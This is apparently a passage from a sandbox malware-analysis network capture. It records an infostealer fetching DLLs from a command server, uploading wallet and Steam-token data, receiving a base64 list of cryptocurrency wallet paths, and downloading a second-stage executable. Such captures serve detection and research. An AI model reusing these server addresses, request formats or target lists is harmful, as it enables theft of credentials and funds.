00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 13, 2024 20:39:53.906497002 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:54.187125921 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:54 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 13, 2024 20:39:54.555730104 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 13, 2024 20:39:54.835458994 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:54 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 13, 2024 20:39:55.349981070 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAEHDAKECGCAKFCFIJ Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:39:56.139238119 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:56.247399092 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDAAFBKFHIEBFCFBK Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 41 41 46 42 4b 46 48 49 45 42 46 43 46 42 4b 2d 2d 0d 0a Data Ascii: ------DAKJDAAFBKFHIEBFCFBKContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------DAKJDAAFBKFHIEBFCFBKContent-Disposition: form-data; name="message"wallets------DAKJDAAFBKFHIEBFCFBK--
Nov 13, 2024 20:39:56.529299021 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:56 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 13, 2024 20:39:56.532505989 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="message"files------CAKKEGDGCGDAKEBFIJEC--
Nov 13, 2024 20:39:56.813843966 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:56.832067966 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="file"------BAFCGIJDAFBKFIECBGCA--
Nov 13, 2024 20:39:57.605374098 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:57.633460999 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="message"ybncbhylepme------EBAAFCAFCBKFHJJJKKFH--
Nov 13, 2024 20:39:57.915746927 CET	271	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	50022	185.215.113.16	80	2232	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:39:57.925312996 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 13, 2024 20:39:58.838917971 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:39:58 GMT Content-Type: application/octet-stream Content-Length: 3278336 Last-Modified: Wed, 13 Nov 2024 19:21:38 GMT Connection: keep-alive ETag: "6734fc42-320600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 10 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf2@@282@Wk1d1 @.rsrc@.idata @suzdiwdyP+L+@otlnilqb21@.taggant02"1@
Nov 13, 2024 20:39:58.838990927 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:39:58.839088917 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:39:58.839106083 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:39:58.839116096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:39:58.839126110 CET	1236	IN	Data Raw: 23 37 93 1c ed b6 94 34 b2 b6 5f 01 26 5d cf 9c 9d 77 d8 34 12 a7 bc 7a 59 db 82 a2 5a f3 fa 44 24 37 93 1c cd b6 94 34 b2 b6 5f 01 26 5d 9f 9c dd 77 d8 34 12 8f bc 7a 59 db 62 a2 5a f3 fa a4 24 37 93 1c ad b6 94 34 b2 b6 5f 01 26 5d 9f 9c ed 77 Data Ascii: #74_&]w4zYZD$74_&]w4zYbZ$74_&]w4zYBZ%74_&]w4zY"Zd%7m4_&]]x4zYZ%7M4_&]ux4zYZ$&7-4_&]x4CzYZ&74_&]x
Nov 13, 2024 20:39:58.839138031 CET	648	IN	Data Raw: 12 17 bf 7a 59 db c2 9d 5a f3 fa 84 32 37 93 1c 0d b1 94 34 b2 b6 5f 01 26 5d 97 9c c9 79 d8 34 12 cf c4 7a 59 db a2 9d 5a f3 fa e4 32 37 93 1c ed b1 94 34 b2 b6 5f 01 26 5d 9f 9c d1 79 d8 34 12 e7 c4 7a 59 db 82 9d 5a f3 fa 44 33 37 93 1c cd b1 Data Ascii: zYZ274_&]y4zYZ274_&]y4zYZD374_&]y4zYbZ374_&]y4OzYBZ474_&]y4ozY"Zd47m4_&]y4zYZ47M4_&]y4zYZ$57-
Nov 13, 2024 20:39:58.839472055 CET	1236	IN	Data Raw: 5a f3 fa 04 3a 37 93 1c 8d af 94 34 b2 b6 5f 01 26 5d 9b 9c 15 7a d8 34 12 cf c1 7a 59 db 22 9b 5a f3 fa 64 3a 37 93 1c 6d af 94 34 b2 b6 5f 01 26 5d 9b 9c 21 7a d8 34 12 67 c3 7a 59 db 02 9b 5a f3 fa c4 3a 37 93 1c 4d ae 94 34 b2 b6 5f 01 26 5d Data Ascii: Z:74_&]z4zY"Zd:7m4_&]!z4gzYZ:7M4_&]-z4?zYZ$;7-4_&]9z4zYZ;74_&]Mz4szYZ;74_&]a{4czYZD<74_&]i{4zYbZ<74_&]
Nov 13, 2024 20:39:58.839482069 CET	1236	IN	Data Raw: 69 7f d8 34 12 97 c6 7a 59 db 62 96 5a f3 fa a4 48 37 93 1c ad aa 94 34 b2 b6 5f 01 26 5d 9f 9c 8d 7f d8 34 12 df c0 7a 59 db 42 96 5a f3 fa 04 49 37 93 1c 8d aa 94 34 b2 b6 5f 01 26 5d 9f 9c 9d 7f d8 34 12 27 c4 7a 59 db 22 96 5a f3 fa 64 49 37 Data Ascii: i4zYbZH74_&]4zYBZI74_&]4'zY"ZdI7m4_&]4zYZI7M4_&]4zYZ$J7-4_&]4zYZJ74_&]4zYZJ74_&]4zYZDK7
Nov 13, 2024 20:39:58.839493036 CET	1236	IN	Data Raw: 1d fb 1d fb b7 50 55 39 59 02 ea f4 e4 b4 f9 43 2f 34 97 fb 9a f7 e2 b5 9e f3 59 36 cd f9 d7 34 1c bf 5f 01 26 bf 5f 01 26 44 7b 16 eb f4 92 8d 1c bf 5f 01 26 bf 5f 01 26 48 1e 21 b0 f2 08 3d e4 e4 e9 1c 62 84 94 34 dc b7 9b bf 1f 51 f0 f6 5d f3 Data Ascii: PU9YC/4Y64_&_&D{_&_&H!=b4Q]^&_&H!~=hJSi;A#6YI{8PV&_&_&_&H!L74YC4Iy9gC zMW65YYzU4YC{&_&_&_&H!{gX]48A[7Y_&H!~D
Nov 13, 2024 20:39:58.844010115 CET	1236	IN	Data Raw: 65 7e de 40 20 fa 1e 3b 9e f3 1b 84 69 7e e0 28 be 7c a0 34 59 f3 92 8d b8 51 1e 82 45 26 60 1d 9c 9a 94 34 e4 d8 f0 bf 3c 4e 55 41 59 db 40 78 5c f3 7a dd 9c f6 92 00 26 bf 5f 01 26 bf 5f 01 26 bf 5f 01 26 48 1e 21 b0 7e 84 c2 9f f7 59 3b ed f8 Data Ascii: e~@ ;i~(\|4YQE&`4<NUAY@x\z&_&_&_&H!~Y;4D\]<ZgmI{PU9YH!74YC!vI4Iy9gC zMW65YJ\|%8IZ4 8DYJ48k4Y3Yh4HS]@kw/Z4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	50067	185.215.113.206	80	2232	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:40:05.348871946 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDBFBFCBFBKECAAKJKFB--
Nov 13, 2024 20:40:06.750461102 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:40:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50138	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:04.659892082 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:41:05.568912029 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50139	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

